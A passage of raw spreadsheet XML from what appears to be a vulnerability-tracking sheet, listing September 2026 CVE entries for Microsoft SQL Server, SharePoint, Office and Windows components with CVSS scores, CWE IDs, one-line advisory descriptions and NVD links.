t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C115" s="5" t="inlineStr"><is><t>CVE-2026-67368</t></is></c><c r="D115" s="5" t="n"><v>8.800000000000001</v></c><c r="E115" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G115" s="5" t="inlineStr" /><c r="H115" s="5" t="n"><v>0.007</v></c><c r="I115" s="5" t="inlineStr" /><c r="J115" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K115" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L115" s="5" t="inlineStr" /><c r="M115" s="5" t="inlineStr" /><c r="N115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P115" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q115" s="5" t="inlineStr" /><c r="R115" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S115" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t></is></c></row><row r="116"><c r="A116" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C116" s="5" t="inlineStr"><is><t>CVE-2026-67370</t></is></c><c r="D116" s="5" t="n"><v>8.800000000000001</v></c><c r="E116" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G116" s="5" t="inlineStr" /><c r="H116" s="5" t="n"><v>0.007</v></c><c r="I116" s="5" t="inlineStr" /><c r="J116" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K116" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L116" s="5" t="inlineStr" /><c r="M116" s="5" t="inlineStr" /><c r="N116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P116" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q116" s="5" t="inlineStr" /><c r="R116" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S116" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t></is></c></row><row r="117"><c r="A117" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C117" s="5" t="inlineStr"><is><t>CVE-2026-67373</t></is></c><c r="D117" s="5" t="n"><v>8.800000000000001</v></c><c r="E117" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G117" s="5" t="inlineStr" /><c r="H117" s="5" t="n"><v>0.006</v></c><c r="I117" s="5" t="inlineStr" /><c r="J117" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K117" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L117" s="5" t="inlineStr" /><c r="M117" s="5" t="inlineStr" /><c r="N117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P117" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q117" s="5" t="inlineStr" /><c r="R117" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S117" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t></is></c></row><row r="118"><c r="A118" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C118" s="5" t="inlineStr"><is><t>CVE-2026-67380</t></is></c><c r="D118" s="5" t="n"><v>8.800000000000001</v></c><c r="E118" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G118" s="5" t="inlineStr" /><c r="H118" s="5" t="n"><v>0.007</v></c><c r="I118" s="5" t="inlineStr" /><c r="J118" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K118" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L118" s="5" t="inlineStr" /><c r="M118" s="5" t="inlineStr" /><c r="N118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P118" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q118" s="5" t="inlineStr" /><c r="R118" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S118" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t></is></c></row><row r="119"><c r="A119" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C119" s="5" t="inlineStr"><is><t>CVE-2026-67381</t></is></c><c r="D119" s="5" t="n"><v>8.800000000000001</v></c><c r="E119" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G119" s="5" t="inlineStr" /><c r="H119" s="5" t="n"><v>0.005</v></c><c r="I119" s="5" t="inlineStr" /><c r="J119" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K119" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L119" s="5" t="inlineStr" /><c r="M119" s="5" t="inlineStr" /><c r="N119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P119" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q119" s="5" t="inlineStr" /><c r="R119" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S119" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t></is></c></row><row r="120"><c r="A120" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C120" s="5" t="inlineStr"><is><t>CVE-2026-67384</t></is></c><c r="D120" s="5" t="n"><v>8.800000000000001</v></c><c r="E120" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G120" s="5" t="inlineStr" /><c r="H120" s="5" t="n"><v>0.006</v></c><c r="I120" s="5" t="inlineStr" /><c r="J120" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K120" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L120" s="5" t="inlineStr" /><c r="M120" s="5" t="inlineStr" /><c r="N120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P120" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q120" s="5" t="inlineStr" /><c r="R120" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S120" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t></is></c></row><row r="121"><c r="A121" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C121" s="5" t="inlineStr"><is><t>CVE-2026-67385</t></is></c><c r="D121" s="5" t="n"><v>8.800000000000001</v></c><c r="E121" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G121" s="5" t="inlineStr" /><c r="H121" s="5" t="n"><v>0.005</v></c><c r="I121" s="5" t="inlineStr" /><c r="J121" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K121" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L121" s="5" t="inlineStr" /><c r="M121" s="5" t="inlineStr" /><c r="N121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P121" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q121" s="5" t="inlineStr" /><c r="R121" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S121" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t></is></c></row><row r="122"><c r="A122" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C122" s="5" t="inlineStr"><is><t>CVE-2026-67388</t></is></c><c r="D122" s="5" t="n"><v>8.800000000000001</v></c><c r="E122" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G122" s="5" t="inlineStr" /><c r="H122" s="5" t="n"><v>0.005</v></c><c r="I122" s="5" t="inlineStr" /><c r="J122" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K122" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L122" s="5" t="inlineStr" /><c r="M122" s="5" t="inlineStr" /><c r="N122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P122" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q122" s="5" t="inlineStr" /><c r="R122" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S122" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t></is></c></row><row r="123"><c r="A123" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C123" s="5" t="inlineStr"><is><t>CVE-2026-67631</t></is></c><c r="D123" s="5" t="n"><v>8.800000000000001</v></c><c r="E123" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G123" s="5" t="inlineStr" /><c r="H123" s="5" t="n"><v>0.006</v></c><c r="I123" s="5" t="inlineStr" /><c r="J123" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K123" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L123" s="5" t="inlineStr" /><c r="M123" s="5" t="inlineStr" /><c r="N123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P123" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q123" s="5" t="inlineStr" /><c r="R123" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S123" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t></is></c></row><row r="124"><c r="A124" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C124" s="5" t="inlineStr"><is><t>CVE-2026-67638</t></is></c><c r="D124" s="5" t="n"><v>8.800000000000001</v></c><c r="E124" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F124" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G124" s="5" t="inlineStr" /><c r="H124" s="5" t="n"><v>0.007</v></c><c r="I124" s="5" t="inlineStr" /><c r="J124" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K124" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L124" s="5" t="inlineStr" /><c r="M124" s="5" t="inlineStr" /><c r="N124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P124" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q124" s="5" t="inlineStr" /><c r="R124" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S124" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t></is></c></row><row r="125"><c r="A125" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C125" s="5" t="inlineStr"><is><t>CVE-2026-67639</t></is></c><c r="D125" s="5" t="n"><v>8.800000000000001</v></c><c r="E125" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F125" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G125" s="5" t="inlineStr" /><c r="H125" s="5" t="n"><v>0.007</v></c><c r="I125" s="5" t="inlineStr" /><c r="J125" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K125" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L125" s="5" t="inlineStr" /><c r="M125" s="5" t="inlineStr" /><c r="N125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P125" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q125" s="5" t="inlineStr" /><c r="R125" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S125" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t></is></c></row><row r="126"><c r="A126" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C126" s="5" t="inlineStr"><is><t>CVE-2026-67642</t></is></c><c r="D126" s="5" t="n"><v>8.800000000000001</v></c><c r="E126" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F126" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G126" s="5" t="inlineStr" /><c r="H126" s="5" t="n"><v>0.005</v></c><c r="I126" s="5" t="inlineStr" /><c r="J126" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K126" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L126" s="5" t="inlineStr" /><c r="M126" s="5" t="inlineStr" /><c r="N126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P126" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q126" s="5" t="inlineStr" /><c r="R126" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S126" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t></is></c></row><row r="127"><c r="A127" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C127" s="5" t="inlineStr"><is><t>CVE-2026-67643</t></is></c><c r="D127" s="5" t="n"><v>8.800000000000001</v></c><c r="E127" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G127" s="5" t="inlineStr" /><c r="H127" s="5" t="n"><v>0.008</v></c><c r="I127" s="5" t="inlineStr" /><c r="J127" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K127" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L127" s="5" t="inlineStr" /><c r="M127" s="5" t="inlineStr" /><c r="N127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P127" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q127" s="5" t="inlineStr" /><c r="R127" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S127" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t></is></c></row><row r="128"><c r="A128" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C128" s="5" t="inlineStr"><is><t>CVE-2026-68775</t></is></c><c r="D128" s="5" t="n"><v>8.800000000000001</v></c><c r="E128" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F128" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G128" s="5" t="inlineStr" /><c r="H128" s="5" t="n"><v>0.005</v></c><c r="I128" s="5" t="inlineStr" /><c r="J128" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K128" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L128" s="5" t="inlineStr" /><c r="M128" s="5" t="inlineStr" /><c r="N128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P128" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q128" s="5" t="inlineStr" /><c r="R128" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S128" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t></is></c></row><row r="129"><c r="A129" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C129" s="5" t="inlineStr"><is><t>CVE-2026-68786</t></is></c><c r="D129" s="5" t="n"><v>8.800000000000001</v></c><c r="E129" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G129" s="5" t="inlineStr" /><c r="H129" s="5" t="n"><v>0.005</v></c><c r="I129" s="5" t="inlineStr" /><c r="J129" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K129" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L129" s="5" t="inlineStr" /><c r="M129" s="5" t="inlineStr" /><c r="N129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P129" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q129" s="5" t="inlineStr" /><c r="R129" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S129" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t></is></c></row><row r="130"><c r="A130" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C130" s="5" t="inlineStr"><is><t>CVE-2026-68828</t></is></c><c r="D130" s="5" t="n"><v>8.800000000000001</v></c><c r="E130" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G130" s="5" t="inlineStr" /><c r="H130" s="5" t="n"><v>0.004</v></c><c r="I130" s="5" t="inlineStr" /><c r="J130" s="5" t="inlineStr" /><c r="K130" s="5" t="inlineStr" /><c r="L130" s="5" t="inlineStr" /><c r="M130" s="5" t="inlineStr" /><c r="N130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P130" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q130" s="5" t="inlineStr" /><c r="R130" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S130" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t></is></c></row><row r="131"><c r="A131" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C131" s="5" t="inlineStr"><is><t>CVE-2026-69266</t></is></c><c r="D131" s="5" t="n"><v>8.800000000000001</v></c><c r="E131" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G131" s="5" t="inlineStr" /><c r="H131" s="5" t="n"><v>0.004</v></c><c r="I131" s="5" t="inlineStr" /><c r="J131" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K131" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L131" s="5" t="inlineStr" /><c r="M131" s="5" t="inlineStr" /><c r="N131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P131" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q131" s="5" t="inlineStr" /><c r="R131" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S131" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t></is></c></row><row r="132"><c r="A132" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C132" s="5" t="inlineStr"><is><t>CVE-2026-69268</t></is></c><c r="D132" s="5" t="n"><v>8.800000000000001</v></c><c r="E132" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G132" s="5" t="inlineStr" /><c r="H132" s="5" t="n"><v>0.007</v></c><c r="I132" s="5" t="inlineStr" /><c r="J132" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K132" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L132" s="5" t="inlineStr" /><c r="M132" s="5" t="inlineStr" /><c r="N132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P132" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q132" s="5" t="inlineStr" /><c r="R132" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S132" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t></is></c></row><row r="133"><c r="A133" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C133" s="5" t="inlineStr"><is><t>CVE-2026-69273</t></is></c><c r="D133" s="5" t="n"><v>8.800000000000001</v></c><c r="E133" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G133" s="5" t="inlineStr" /><c r="H133" s="5" t="n"><v>0.005</v></c><c r="I133" s="5" t="inlineStr" /><c r="J133" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K133" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L133" s="5" t="inlineStr" /><c r="M133" s="5" t="inlineStr" /><c r="N133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P133" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q133" s="5" t="inlineStr" /><c r="R133" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S133" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t></is></c></row><row r="134"><c r="A134" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C134" s="5" t="inlineStr"><is><t>CVE-2026-69282</t></is></c><c r="D134" s="5" t="n"><v>8.800000000000001</v></c><c r="E134" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G134" s="5" t="inlineStr" /><c r="H134" s="5" t="n"><v>0.005</v></c><c r="I134" s="5" t="inlineStr" /><c r="J134" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K134" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L134" s="5" t="inlineStr" /><c r="M134" s="5" t="inlineStr" /><c r="N134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P134" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q134" s="5" t="inlineStr" /><c r="R134" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S134" s="5" t="inlineStr"><is><t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="T134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t></is></c></row><row r="135"><c r="A135" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C135" s="5" t="inlineStr"><is><t>CVE-2026-69285</t></is></c><c r="D135" s="5" t="n"><v>8.800000000000001</v></c><c r="E135" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G135" s="5" t="inlineStr" /><c r="H135" s="5" t="n"><v>0.006</v></c><c r="I135" s="5" t="inlineStr" /><c r="J135" s="5" t="inlineStr" /><c r="K135" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L135" s="5" t="inlineStr" /><c r="M135" s="5" t="inlineStr" /><c r="N135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P135" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q135" s="5" t="inlineStr" /><c r="R135" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S135" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t></is></c></row><row r="136"><c r="A136" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B136" s="5" 